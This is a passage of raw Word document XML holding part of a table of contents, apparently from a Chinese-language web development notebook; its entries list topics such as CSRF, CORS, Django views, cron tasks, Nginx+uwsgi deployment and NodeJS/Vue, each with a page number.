            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="5E42D9D8" w14:textId="5E07CB58" w:rsidR="009926EB" w:rsidRDefault="009926EB" w:rsidP="009222EB">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8296"/>
            </w:tabs>
            <w:jc w:val="left"/>
            <w:rPr>
              <w:noProof/>
              <w:szCs w:val="22"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc159780080" w:history="1">
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>先说</w:t>
            </w:r>
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>csrf</w:t>
            </w:r>
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>攻击</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc159780080 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>637</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="45AC231A" w14:textId="3904D2A0" w:rsidR="009926EB" w:rsidRDefault="009926EB" w:rsidP="009222EB">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8296"/>
            </w:tabs>
            <w:jc w:val="left"/>
            <w:rPr>
              <w:noProof/>
              <w:szCs w:val="22"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc159780081" w:history="1">
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>django</w:t>
            </w:r>
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>的</w:t>
            </w:r>
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>csrf</w:t>
            </w:r>
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>保护</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc159780081 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>638</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="77CB7FB9" w14:textId="634CD1BA" w:rsidR="009926EB" w:rsidRDefault="009926EB" w:rsidP="009222EB">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8296"/>
            </w:tabs>
            <w:jc w:val="left"/>
            <w:rPr>
              <w:noProof/>
              <w:szCs w:val="22"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc159780082" w:history="1">
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>django</w:t>
            </w:r>
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>和</w:t>
            </w:r>
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>vue</w:t>
            </w:r>
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>前后端分离如何解决</w:t>
            </w:r>
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>csrf</w:t>
            </w:r>
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>问题</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc159780082 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>638</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="54EFCFE5" w14:textId="2F1E53E2" w:rsidR="009926EB" w:rsidRDefault="009926EB" w:rsidP="009222EB">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8296"/>
            </w:tabs>
            <w:jc w:val="left"/>
            <w:rPr>
              <w:noProof/>
              <w:szCs w:val="22"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc159780083" w:history="1">
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>跨域</w:t>
            </w:r>
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>corsheaders</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc159780083 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>638</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="0F076F6B" w14:textId="1EA19FDD" w:rsidR="009926EB" w:rsidRDefault="009926EB" w:rsidP="009222EB">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8296"/>
            </w:tabs>
            <w:jc w:val="left"/>
            <w:rPr>
              <w:noProof/>
              <w:szCs w:val="22"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc159780084" w:history="1">
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>同源策略和</w:t>
            </w:r>
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>CORS</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc159780084 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>640</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="2B4A0C93" w14:textId="6F1981C5" w:rsidR="009926EB" w:rsidRDefault="009926EB" w:rsidP="009222EB">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8296"/>
            </w:tabs>
            <w:jc w:val="left"/>
            <w:rPr>
              <w:noProof/>
              <w:szCs w:val="22"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc159780085" w:history="1">
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>同源策略（</w:t>
            </w:r>
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Same-Origin Policy</w:t>
            </w:r>
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>）：</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc159780085 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>640</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="52D13FCA" w14:textId="3CFAC926" w:rsidR="009926EB" w:rsidRDefault="009926EB" w:rsidP="009222EB">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8296"/>
            </w:tabs>
            <w:jc w:val="left"/>
            <w:rPr>
              <w:noProof/>
              <w:szCs w:val="22"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc159780086" w:history="1">
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>CORS</w:t>
            </w:r>
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>（</w:t>
            </w:r>
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Cross-Origin Resource Sharing</w:t>
            </w:r>
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>）：</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc159780086 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>640</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="408900CC" w14:textId="6B1094B3" w:rsidR="009926EB" w:rsidRDefault="009926EB" w:rsidP="009222EB">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8296"/>
            </w:tabs>
            <w:jc w:val="left"/>
            <w:rPr>
              <w:noProof/>
              <w:szCs w:val="22"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc159780087" w:history="1">
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>django</w:t>
            </w:r>
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>运行</w:t>
            </w:r>
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>cron</w:t>
            </w:r>
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>定时任务</w:t>
            </w:r>
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t xml:space="preserve"> django-crontab, celery </w:t>
            </w:r>
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>（弃用）</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc159780087 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>641</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="62F078D6" w14:textId="50F07E5B" w:rsidR="009926EB" w:rsidRDefault="009926EB" w:rsidP="009222EB">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8296"/>
            </w:tabs>
            <w:jc w:val="left"/>
            <w:rPr>
              <w:noProof/>
              <w:szCs w:val="22"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc159780088" w:history="1">
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t xml:space="preserve">FBV </w:t>
            </w:r>
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>与</w:t>
            </w:r>
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t xml:space="preserve"> CBV</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc159780088 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>643</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="3E5884B5" w14:textId="39E91F14" w:rsidR="009926EB" w:rsidRDefault="009926EB" w:rsidP="009222EB">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8296"/>
            </w:tabs>
            <w:jc w:val="left"/>
            <w:rPr>
              <w:noProof/>
              <w:szCs w:val="22"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc159780089" w:history="1">
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>FBV</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc159780089 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>643</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="64E7DADC" w14:textId="0996E04A" w:rsidR="009926EB" w:rsidRDefault="009926EB" w:rsidP="009222EB">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8296"/>
            </w:tabs>
            <w:jc w:val="left"/>
            <w:rPr>
              <w:noProof/>
              <w:szCs w:val="22"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc159780090" w:history="1">
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>CBV</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc159780090 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>644</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="2DC41239" w14:textId="5EE29F60" w:rsidR="009926EB" w:rsidRDefault="009926EB" w:rsidP="009222EB">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8296"/>
            </w:tabs>
            <w:jc w:val="left"/>
            <w:rPr>
              <w:noProof/>
              <w:szCs w:val="22"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc159780091" w:history="1">
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Django</w:t>
            </w:r>
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>自动根据</w:t>
            </w:r>
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>app</w:t>
            </w:r>
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>和</w:t>
            </w:r>
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>models</w:t>
            </w:r>
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>绘制类图</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc159780091 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>644</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="55FBE88D" w14:textId="345A45CC" w:rsidR="009926EB" w:rsidRDefault="009926EB" w:rsidP="009222EB">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8296"/>
            </w:tabs>
            <w:jc w:val="left"/>
            <w:rPr>
              <w:noProof/>
              <w:szCs w:val="22"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc159780092" w:history="1">
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t xml:space="preserve">Django Nginx+uwsgi </w:t>
            </w:r>
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>安装配置</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc159780092 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>645</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="3C154CE1" w14:textId="5FCA5DCA" w:rsidR="009926EB" w:rsidRDefault="009926EB" w:rsidP="009222EB">
          <w:pPr>
            <w:pStyle w:val="TOC1"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8296"/>
            </w:tabs>
            <w:jc w:val="left"/>
            <w:rPr>
              <w:noProof/>
              <w:szCs w:val="22"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc159780093" w:history="1">
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>NodeJS</w:t>
            </w:r>
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>，</w:t>
            </w:r>
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>VUE</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc159780093 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>647</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="18331D8C" w14:textId="0B122D4D" w:rsidR="009926EB" w:rsidRDefault="009926EB" w:rsidP="009222EB">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8296"/>
            </w:tabs>
            <w:jc w:val="left"/>
            <w:rPr>
              <w:noProof/>
              <w:szCs w:val="22"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc159780094" w:history="1">
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>升级</w:t>
            </w:r>
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>npm</w:t>
            </w:r>
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>或</w:t>
            </w:r>
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>cnpm</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc159780094 \h </w:instrText>
